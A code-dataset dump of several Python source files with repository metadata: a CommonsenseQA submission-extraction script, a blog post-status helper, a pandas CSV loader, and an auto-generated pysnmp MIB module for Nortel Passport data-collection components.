6b06a0bf4f6d6883c503d6354aadfeff8918c158 | 210 | py | Python | datasets/csqa_new/extract_submission.py | gogowhy/ENet_framework | 74e4417a249376e41878c0595518db2481d45ce1 | [
"MIT"
] | 244 | 2019-09-06T07:53:57.000Z | 2022-03-28T19:32:15.000Z | datasets/csqa_new/extract_submission.py | gogowhy/ENet_framework | 74e4417a249376e41878c0595518db2481d45ce1 | [
"MIT"
] | null | null | null | datasets/csqa_new/extract_submission.py | gogowhy/ENet_framework | 74e4417a249376e41878c0595518db2481d45ce1 | [
"MIT"
] | 61 | 2019-09-14T07:06:57.000Z | 2022-03-16T07:02:52.000Z | import json
with open("test_rand_split.jsonl", 'r') as fw:
for line in open("test_rand_split.jsonl", 'r').readlines():
data = json.loads(line.strip())
print(data["id"]+','+data["answerKey"]) | 42 | 63 | 0.628571 | 31 | 210 | 4.129032 | 0.677419 | 0.125 | 0.1875 | 0.265625 | 0.359375 | 0.359375 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 210 | 5 | 64 | 42 | 0.731429 | 0 | 0 | 0 | 0 | 0 | 0.265403 | 0.199052 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6b0782a9e582959a13bad44c331bf33e0963ce20 | 448 | py | Python | atomicpress/themes/minimal/helpers.py | marteinn/AtomicPress | b8a0ca9c9c327f062833fc4a401a8ac0baccf6d1 | [
"MIT"
] | 7 | 2015-04-10T07:42:53.000Z | 2016-01-20T16:46:48.000Z | atomicpress/themes/minimal/helpers.py | marteinn/AtomicPress | b8a0ca9c9c327f062833fc4a401a8ac0baccf6d1 | [
"MIT"
] | 4 | 2015-09-01T19:39:43.000Z | 2015-09-06T17:57:27.000Z | atomicpress/themes/minimal/helpers.py | marteinn/AtomicPress | b8a0ca9c9c327f062833fc4a401a8ac0baccf6d1 | [
"MIT"
] | 1 | 2016-12-05T16:27:59.000Z | 2016-12-05T16:27:59.000Z | from sqlalchemy import or_, and_
from atomicpress.app import app
from atomicpress.models import Post, PostStatus
def gen_post_status():
"""
Show only published posts outside debug.
"""
if not app.config["DEBUG"]:
post_status = and_(Post.status == PostStatus.PUBLISH)
else:
post_status = or_(Post.status == PostStatus.PUBLISH,
Post.status == PostStatus.DRAFT)
return post_status
| 24.888889 | 61 | 0.658482 | 53 | 448 | 5.396226 | 0.490566 | 0.244755 | 0.20979 | 0.188811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252232 | 448 | 17 | 62 | 26.352941 | 0.853731 | 0.089286 | 0 | 0 | 0 | 0 | 0.012755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6b08b63255aa6aef6063d2bb955dc708928c668c | 177 | py | Python | src/data/helpers.py | martinlarsalbert/roll_decay_damping | 5982fae683ee2b4d3b51d07956a1a9544f89d629 | [
"MIT"
] | null | null | null | src/data/helpers.py | martinlarsalbert/roll_decay_damping | 5982fae683ee2b4d3b51d07956a1a9544f89d629 | [
"MIT"
] | null | null | null | src/data/helpers.py | martinlarsalbert/roll_decay_damping | 5982fae683ee2b4d3b51d07956a1a9544f89d629 | [
"MIT"
] | null | null | null | import pandas as pd
import os
def load(file_name):
file_path = os.path.join('../../data/external/',file_name)
data = pd.read_csv(file_path, index_col=0)
return data | 25.285714 | 62 | 0.694915 | 30 | 177 | 3.9 | 0.633333 | 0.136752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006757 | 0.163842 | 177 | 7 | 63 | 25.285714 | 0.783784 | 0 | 0 | 0 | 0 | 0 | 0.11236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
6b17d5bee29a57e35b7da4ad3f75206d512304bf | 44,731 | py | Python | pysnmp-with-texts/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module Nortel-MsCarrier-MscPassport-DataCollectionMIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-DataCollectionMIB
# Produced by pysmi-0.3.4 at Wed May 1 14:29:37 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ValueSizeConstraint, SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection")
Unsigned32, RowStatus, Integer32, Gauge32, DisplayString, Counter32, StorageType = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "Unsigned32", "RowStatus", "Integer32", "Gauge32", "DisplayString", "Counter32", "StorageType")
NonReplicated, EnterpriseDateAndTime, AsciiString = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "NonReplicated", "EnterpriseDateAndTime", "AsciiString")
mscComponents, mscPassportMIBs = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscComponents", "mscPassportMIBs")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, TimeTicks, Counter64, Unsigned32, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Bits, Gauge32, IpAddress, Counter32, NotificationType, iso, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "TimeTicks", "Counter64", "Unsigned32", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Bits", "Gauge32", "IpAddress", "Counter32", "NotificationType", "iso", "ModuleIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
dataCollectionMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14))
mscCol = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21))
mscColRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1), )
if mibBuilder.loadTexts: mscColRowStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRowStatusTable.setDescription('This entry controls the addition and deletion of mscCol components.')
mscColRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"))
if mibBuilder.loadTexts: mscColRowStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRowStatusEntry.setDescription('A single entry in the table represents a single mscCol component.')
mscColRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRowStatus.setDescription('This variable is used as the basis for SNMP naming of mscCol components. These components can be added.')
mscColComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColComponentName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColComponentName.setDescription("This variable provides the component's string name for use with the ASCII Console Interface")
mscColStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColStorageType.setStatus('mandatory')
if mibBuilder.loadTexts: mscColStorageType.setDescription('This variable represents the storage type value for the mscCol tables.')
mscColIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("accounting", 0), ("alarm", 1), ("log", 2), ("debug", 3), ("scn", 4), ("trap", 5), ("stats", 6))))
if mibBuilder.loadTexts: mscColIndex.setStatus('mandatory')
if mibBuilder.loadTexts: mscColIndex.setDescription('This variable represents the index for the mscCol tables.')
mscColProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10), )
if mibBuilder.loadTexts: mscColProvTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColProvTable.setDescription('This group specifies all of the provisioning data for a DCS Collector.')
mscColProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"))
if mibBuilder.loadTexts: mscColProvEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColProvEntry.setDescription('An entry in the mscColProvTable.')
mscColAgentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1, 1), Unsigned32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(20, 10000), ))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColAgentQueueSize.setStatus('obsolete')
if mibBuilder.loadTexts: mscColAgentQueueSize.setDescription("This attribute has been replaced with the agentQueueSize attribute in the Lp Engineering DataStream Ov component. Upon migration, if the existing provisioned value of this attribute is the same as the system default for this type of data, no new components are added because the default is what the DataStream component already would be using. Otherwise, if the value is not the same as the system default, then for each Lp which is provisioned at the time of the migration, a DataStream is provisioned and the Ov's agentQueueSize is set to the non-default value.")
mscColStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11), )
if mibBuilder.loadTexts: mscColStatsTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColStatsTable.setDescription('This group specifies the statistics operational attributes of the DCS Collector, Agent and Spooler components.')
mscColStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"))
if mibBuilder.loadTexts: mscColStatsEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColStatsEntry.setDescription('An entry in the mscColStatsTable.')
mscColCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColCurrentQueueSize.setStatus('mandatory')
if mibBuilder.loadTexts: mscColCurrentQueueSize.setDescription('This gauge contains the current number of records held by this DCS component.')
mscColRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColRecordsRx.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRecordsRx.setDescription('This counter contains the cumulative number of records received by a DCS component, from applications which send data to it, since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColRecordsDiscarded.setStatus('mandatory')
if mibBuilder.loadTexts: mscColRecordsDiscarded.setDescription('This is the cumulative number of records discarded by this DCS component since the processor last restarted. This counter wraps to 0 when the maximum value is exceeded.')
mscColTimesTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266), )
if mibBuilder.loadTexts: mscColTimesTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesTable.setDescription('This attribute specifies the scheduled times at which data should be collected. Only accounting applications need the capability to generate data in this way. Setting this attribute for other streams has no effect. The user can enter the times in any order and duplicates are prevented at data entry. There is a limit of 24 entries, which is imposed at semantic check time. The collection times are triggered in chronological order. A semantic check error is issued if any 2 entries are less than 1 hour apart or if any 2 entries are more than 12 hours apart (which implies that if any entries are provided, there must be at least 2 entries). Note that by default (that is, in the absence of a provisioned schedule), a Virtual Circuit (VC) starts its own 12-hour accounting timer. If any collection times are provisioned here, then the Time- Of-Day-Accounting (TODA) method is used in place of 12-hour accounting. This is applicable to both Switched VCs and Permanent VCs.')
mscColTimesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColTimesValue"))
if mibBuilder.loadTexts: mscColTimesEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesEntry.setDescription('An entry in the mscColTimesTable.')
mscColTimesValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColTimesValue.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesValue.setDescription('This variable represents both the value and the index for the mscColTimesTable.')
mscColTimesRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 2), RowStatus()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: mscColTimesRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColTimesRowStatus.setDescription('This variable is used to control the addition and deletion of individual values of the mscColTimesTable.')
mscColLastTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275), )
if mibBuilder.loadTexts: mscColLastTable.setStatus('obsolete')
if mibBuilder.loadTexts: mscColLastTable.setDescription('Note: This was made obsolete in R4.1 (BD0108A). This attribute is used for Collector/stats and Collector/account. For statistics, when collection is turned off, or prior to the very first probe, the value is the empty list. Otherwise, this is the network time at which the last probe was sent out (that is, the last time that statistics were collected from, or at least reset by, the applications providing them). For accounting, when no entries exist in collectionTimes, or prior to the very first collection time, the value is the empty list. Otherwise, this is the network time at which the last time-of-day changeover occurred.')
mscColLastEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColLastValue"))
if mibBuilder.loadTexts: mscColLastEntry.setStatus('obsolete')
if mibBuilder.loadTexts: mscColLastEntry.setDescription('An entry in the mscColLastTable.')
mscColLastValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(19, 19)).setFixedLength(19)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColLastValue.setStatus('obsolete')
if mibBuilder.loadTexts: mscColLastValue.setDescription('This variable represents both the value and the index for the mscColLastTable.')
mscColPeakTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279), )
if mibBuilder.loadTexts: mscColPeakTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakTable.setDescription('This attribute specifies the length of the accounting peak water mark interval. It is at least one minute and at most 15 minutes long. An accounting peak water mark within a given accounting interval is the accounting count which occured during a peak water mark interval with the highest traffic. Peak water marks are used to determine traffic bursts. If no value is provisioned for this attribute value of 5 minutes is assumed. Peak water mark is only measured if attribute collectionTimes in Collector/account is provisioned.')
mscColPeakEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColPeakValue"))
if mibBuilder.loadTexts: mscColPeakEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakEntry.setDescription('An entry in the mscColPeakTable.')
mscColPeakValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColPeakValue.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakValue.setDescription('This variable represents both the value and the index for the mscColPeakTable.')
mscColPeakRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 2), RowStatus()).setMaxAccess("writeonly")
if mibBuilder.loadTexts: mscColPeakRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColPeakRowStatus.setDescription('This variable is used to control the addition and deletion of individual values of the mscColPeakTable.')
mscColSp = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2))
mscColSpRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1), )
if mibBuilder.loadTexts: mscColSpRowStatusTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRowStatusTable.setDescription('This entry controls the addition and deletion of mscColSp components.')
mscColSpRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpRowStatusEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRowStatusEntry.setDescription('A single entry in the table represents a single mscColSp component.')
mscColSpRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpRowStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpRowStatus.setDescription('This variable is used as the basis for SNMP naming of mscColSp components. These components cannot be added nor deleted.')
mscColSpComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpComponentName.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpComponentName.setDescription("This variable provides the component's string name for use with the ASCII Console Interface")
mscColSpStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpStorageType.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStorageType.setDescription('This variable represents the storage type value for the mscColSp tables.')
mscColSpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscColSpIndex.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpIndex.setDescription('This variable represents the index for the mscColSp tables.')
mscColSpProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10), )
if mibBuilder.loadTexts: mscColSpProvTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpProvTable.setDescription('This group specifies all of the provisioning data for a DCS Spooler.')
mscColSpProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpProvEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpProvEntry.setDescription('An entry in the mscColSpProvTable.')
mscColSpSpooling = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("off", 0), ("on", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColSpSpooling.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpSpooling.setDescription('This attribute specifies whether or not this type of data is spooled to the disk. If set to off, it is roughly equivalent to Locking the Spooler (except this will survive processor restarts). The following defaults are used: - alarm: on - accounting: on - log: on - debug: off - scn: on - trap: off (see Note below) - stats: on Note that SNMP Traps cannot be spooled. A semantic check prevents the user from setting the value to on for the trap stream.')
mscColSpMaximumNumberOfFiles = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 200))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscColSpMaximumNumberOfFiles.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpMaximumNumberOfFiles.setDescription("This attribute specifies the maximum number of files that should be kept on the disk in the directory containing the closed files of this type. The value 0 is defined to mean 'unlimited'. A different default for each type of Spooler is defined as follows: - alarm: 30 - accounting: 200 - debug: 2 - log: 10 - scn: 10 - trap: 2 (this value is meaningless and is ignored) - stats: 200")
mscColSpStateTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11), )
if mibBuilder.loadTexts: mscColSpStateTable.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStateTable.setDescription('This group contains the three OSI State attributes and the six OSI Status attributes. The descriptions generically indicate what each attribute implies about the component. Note that not all the values and state combinations described here are supported by every component which uses this group. For component-specific information and the valid state combinations, refer to NTP 241- 7001-150, Passport Operations and Maintenance Guide.')
mscColSpStateEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex"))
if mibBuilder.loadTexts: mscColSpStateEntry.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpStateEntry.setDescription('An entry in the mscColSpStateTable.')
mscColSpAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("locked", 0), ("unlocked", 1), ("shuttingDown", 2))).clone('unlocked')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpAdminState.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpAdminState.setDescription('This attribute indicates the OSI Administrative State of the component. The value locked indicates that the component is administratively prohibited from providing services for its users. A Lock or Lock - force command has been previously issued for this component. When the value is locked, the value of usageState must be idle. The value shuttingDown indicates that the component is administratively permitted to provide service to its existing users only. A Lock command was issued against the component and it is in the process of shutting down. The value unlocked indicates that the component is administratively permitted to provide services for its users. To enter this state, issue an Unlock command to this component. The OSI Status attributes, if supported by the component, may provide more details, qualifying the state of the component.')
mscColSpOperationalState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disabled", 0), ("enabled", 1))).clone('disabled')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpOperationalState.setDescription('This attribute indicates the OSI Operational State of the component. The value enabled indicates that the component is available for operation. Note that if adminState is locked, it would still not be providing service. The value disabled indicates that the component is not available for operation. For example, something is wrong with the component itself, or with another component on which this one depends. If the value is disabled, the usageState must be idle. The OSI Status attributes, if supported by the component, may provide more details, qualifying the state of the component.')
mscColSpUsageState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("idle", 0), ("active", 1), ("busy", 2))).clone('idle')).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpUsageState.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpUsageState.setDescription('This attribute indicates the OSI Usage State of the component. The value idle indicates that the component is not currently in use. The value active indicates that the component is in use and has spare capacity to provide for additional users. The value busy indicates that the component is in use and has no spare operating capacity for additional users at this time. The OSI Status attributes, if supported by the component, may provide more details, qualifying the state of the component.')
mscColSpAvailabilityStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpAvailabilityStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpAvailabilityStatus.setDescription('If supported by the component, this attribute indicates the OSI Availability status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value inTest indicates that the resource is undergoing a test procedure. If adminState is locked or shuttingDown, the normal users are precluded from using the resource and controlStatus is reservedForTest. Tests that do not exclude additional users can be present in any operational or administrative state but the reservedForTest condition should not be present. The value failed indicates that the component has an internal fault that prevents it from operating. The operationalState is disabled. The value dependency indicates that the component cannot operate because some other resource on which it depends is unavailable. The operationalState is disabled. The value powerOff indicates the resource requires power to be applied and it is not powered on. The operationalState is disabled. The value offLine indicates the resource requires a routine operation (either manual, automatic, or both) to be performed to place it on-line and make it available for use. The operationalState is disabled. The value offDuty indicates the resource is inactive in accordance with a predetermined time schedule. In the absence of other disabling conditions, the operationalState is enabled or disabled. The value degraded indicates the service provided by the component is degraded in some way, such as in speed or operating capacity. However, the resource remains available for service. The operationalState is enabled. The value notInstalled indicates the resource is not present. The operationalState is disabled. The value logFull is not used. Description of bits: inTest(0) failed(1) powerOff(2) offLine(3) offDuty(4) dependency(5) degraded(6) notInstalled(7) logFull(8)')
mscColSpProceduralStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpProceduralStatus.setStatus('mandatory')
if mibBuilder.loadTexts: mscColSpProceduralStatus.setDescription("If supported by the component, this attribute indicates the OSI Procedural status of the component. Note that, even though it is defined as a multi-valued set, at most one value is shown to the user. When no values are in the set, this indicates that either the attribute is not supported or that none of the status conditions described below are present. The value initializationRequired indicates (for a resource which doesn't initialize autonomously) that initialization is required before it can perform its normal functions, and this procedure has not been initiated. The operationalState is disabled. The value notInitialized indicates (for a resource which does initialize autonomously) that initialization is required before it can perform its normal functions, and this procedure has not been initiated. The operationalState may be enabled or disabled. The value initializing indicates that initialization has been initiated but is not yet complete. The operationalState may be enabled or disabled. The value reporting indicates the resource has completed some processing operation and is notifying the results. The operationalState is enabled. The value terminating indicates the component is in a termination phase. If the resource doesn't reinitialize autonomously, operationalState is disabled; otherwise it is enabled or disabled. Description of bits: initializationRequired(0) notInitialized(1) initializing(2) reporting(3) terminating(4)")
mscColSpControlStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscColSpControlStatus.setStatus('mandatory')
